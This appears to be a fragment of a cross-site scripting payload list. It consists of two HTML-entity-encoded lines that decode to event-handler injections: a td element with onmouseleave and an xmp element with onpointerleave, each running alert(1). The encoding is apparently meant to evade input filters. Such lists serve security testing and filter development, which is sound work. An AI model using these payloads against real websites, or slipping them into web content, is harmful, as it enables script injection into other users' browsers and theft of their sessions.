&#34;&#60;&#116;&#100;&#32;&#111;&#110;&#109;&#111;&#117;&#115;&#101;&#108;&#101;&#97;&#118;&#101;&#61;&#34;&#34;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#34;&#34;&#62;&#116;&#101;&#115;&#116;&#60;&#47;&#116;&#100;&#62;&#34;
&#60;&#120;&#109;&#112;&#32;&#111;&#110;&#112;&#111;&#105;&#110;&#116;&#101;&#114;&#108;&#101;&#97;&#118;&#101;&#61;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#62;&#88;&#83;&#83;&#60;&#47;&#120;&#109;&#112;&#62;
